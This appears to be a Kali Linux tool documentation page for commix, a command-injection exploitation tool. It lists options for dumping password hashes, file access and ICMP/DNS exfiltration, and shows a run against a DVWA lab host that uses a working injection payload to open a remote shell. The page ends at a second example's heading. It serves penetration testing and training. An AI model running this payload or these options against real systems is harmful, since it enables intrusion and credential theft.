commix Package Description

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.

Source: https://github.com/stasinopoulos/commix

Commix Homepage | Kali commix Repo | Kali commix Package

Author: Anastasios Stasinopoulos

License: GPLv3

Tools included in the commix package

commix – Automated All-in-One OS Command Injection and Exploitation Tool

root@kali:~# commix -h

Usage: commix [option(s)]



Options:

-h, --help Show help and exit.



General:

These options relate to general matters.



-v VERBOSE Verbosity level (0-4, Default: 0).

--version Show version number and exit.

--output-dir=OUT.. Set custom output directory path.

-s SESSION_FILE Load session from a stored (.sqlite) file.

--flush-session Flush session files for current target.

--ignore-session Ignore results stored in session file.

-t TRAFFIC_FILE Log all HTTP traffic into a textual file.

--batch Never ask for user input, use the default behaviour.

--encoding=ENCOD.. Force character encoding used for data retrieval (e.g.

GBK).

--charset=CHARSET Time-related injection charset (e.g.

"0123456789abcdef")

--check-internet Check internet connection before assessing the target.



Target:

This options has to be provided, to define the target URL.



-u URL, --url=URL Target URL.

--url-reload Reload target URL after command execution.

-l LOGFILE Parse target from HTTP proxy log file.

-m BULKFILE Scan multiple targets given in a textual file.

-r REQUESTFILE Load HTTP request from a file.

--crawl=CRAWLDEPTH Crawl the website starting from the target URL (1-2,

Default: 0).

-x SITEMAP_URL Parse target(s) from remote sitemap(.xml) file.



Request:

These options can be used to specify how to connect to the target URL.



-d DATA, --data=.. Data string to be sent through POST.

--host=HOST HTTP Host header.

--referer=REFERER HTTP Referer header.

--user-agent=AGENT HTTP User-Agent header.

--random-agent Use a randomly selected HTTP User-Agent header.

--param-del=PDEL Set character for splitting parameter values.

--cookie=COOKIE HTTP Cookie header.

--cookie-del=CDEL Set character for splitting cookie values.

-H HEADER, --hea.. Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').

--headers=HEADERS Extra headers (e.g. 'Accept-Language: fr

ETag: 123').

--proxy=PROXY Use a HTTP proxy (e.g. '127.0.0.1:8080').

--tor Use the Tor network.

--tor-port=TOR_P.. Set Tor proxy port (Default: 8118).

--tor-check Check to see if Tor is used properly.

--auth-url=AUTH_.. Login panel URL.

--auth-data=AUTH.. Login parameters and data.

--auth-type=AUTH.. HTTP authentication type (e.g. 'Basic' or 'Digest').

--auth-cred=AUTH.. HTTP authentication credentials (e.g. 'admin:admin').

--ignore-401 Ignore HTTP error 401 (Unauthorized).

--force-ssl Force usage of SSL/HTTPS.

--ignore-redirects Ignore redirection attempts.

--retries=RETRIES Retries when the connection timeouts (Default: 3).



Enumeration:

These options can be used to enumerate the target host.



--all Retrieve everything.

--current-user Retrieve current user name.

--hostname Retrieve current hostname.

--is-root Check if the current user have root privileges.

--is-admin Check if the current user have admin privileges.

--sys-info Retrieve system information.

--users Retrieve system users.

--passwords Retrieve system users password hashes.

--privileges Retrieve system users privileges.

--ps-version Retrieve PowerShell's version number.



File access:

These options can be used to access files on the target host.



--file-read=FILE.. Read a file from the target host.

--file-write=FIL.. Write to a file on the target host.

--file-upload=FI.. Upload a file on the target host.

--file-dest=FILE.. Host's absolute filepath to write and/or upload to.



Modules:

These options can be used increase the detection and/or injection

capabilities.



--icmp-exfil=IP_.. The 'ICMP exfiltration' injection module.

(e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').

--dns-server=DNS.. The 'DNS exfiltration' injection module.

(Domain name used for DNS exfiltration attack).

--shellshock The 'shellshock' injection module.



Injection:

These options can be used to specify which parameters to inject and to

provide custom injection payloads.



-p TEST_PARAMETER Testable parameter(s).

--skip=SKIP_PARA.. Skip testing for given parameter(s).

--suffix=SUFFIX Injection payload suffix string.

--prefix=PREFIX Injection payload prefix string.

--technique=TECH Specify injection technique(s) to use.

--skip-technique.. Specify injection technique(s) to skip.

--maxlen=MAXLEN Set the max length of output for time-related

injection techniques (Default: 10000 chars).

--delay=DELAY Seconds to delay between each HTTP request.

--time-sec=TIMESEC Seconds to delay the OS response (Default 1).

--tmp-path=TMP_P.. Set the absolute path of web server's temp directory.

--web-root=WEB_R.. Set the web server document root directory (e.g.

'/var/www').

--alter-shell=AL.. Use an alternative os-shell (e.g. 'Python').

--os-cmd=OS_CMD Execute a single operating system command.

--os=OS Force back-end operating system (e.g. 'Windows' or

'Unix').

--tamper=TAMPER Use given script(s) for tampering injection data.

--msf-path=MSF_P.. Set a local path where metasploit is installed.

--backticks Use backticks instead of "$()", for commands

substitution.



Detection:

These options can be used to customize the detection phase.



--level=LEVEL Level of tests to perform (1-3, Default: 1).

--skip-calc Skip the mathematic calculation during the detection

phase.

--skip-empty Skip testing the parameter(s) with empty value(s).

--failed-tries=F.. Set a number of failed injection tries, in file-based

technique.



Miscellaneous:

--dependencies Check for third-party (non-core) dependencies.

--list-tampers Display list of available tamper scripts

--purge Safely remove all content from commix data directory.

--skip-waf Skip heuristic detection of WAF/IPS/IDS protection.

--mobile Imitate smartphone through HTTP User-Agent header.

--offline Work in offline mode.

--wizard Simple wizard interface for beginner users.

--disable-coloring Disable console output coloring.

Commix Usage Example

root@kali:~# commix --url http://192.168.20.12/dvwa/vulnerabilities/exec/ \

> --cookie='PHPSESSID=cj645co26lgve7ro1kc9dvt3a0; security=low' \

> --data='ip=INJECT_HERE&Submit=Submit'

__

___ ___ ___ ___ ___ ___ /\_\ __ _

/'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\

/\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/> </

\ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\

\/____/\/___/ \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.3b-nongit-20160104 }



+--

Automated All-in-One OS Command Injection and Exploitation Tool

Copyright (c) 2014-2015 Anastasios Stasinopoulos (@ancst)

+--



(*) Checking connection to the target URL... [ SUCCEED ]

(^) Warning: Heuristics have failed to identify server's operating system.

(?) Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > w

(*) Setting the (POST) 'ip' parameter for tests.

(^) Warning: Due to the relatively slow response of 'cmd.exe' there may be delays during the data extraction procedure.

(*) Testing the classic injection technique... [ SUCCEED ]

(!) The (POST) 'ip' parameter is vulnerable to Results-based Command Injection.

(+) Type : Results-based Command Injection

(+) Technique : Classic Injection Technique

(+) Payload : %26 for /f "delims=" %i in ('cmd /c "set /a (49+1)"') do @set /p = AWMZVA%iAWMZVAAWMZVA <nul



(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > y



Pseudo-Terminal (type '?' for available options)

commix(os_shell) > whoami



nt authority\iusr



commix(os_shell) >

Attempt to exploit a site (–url=”http://192.168.0.23/commix-testbed/scenarios/referer/referer(classic).php”) using the highest testing level (–level=3):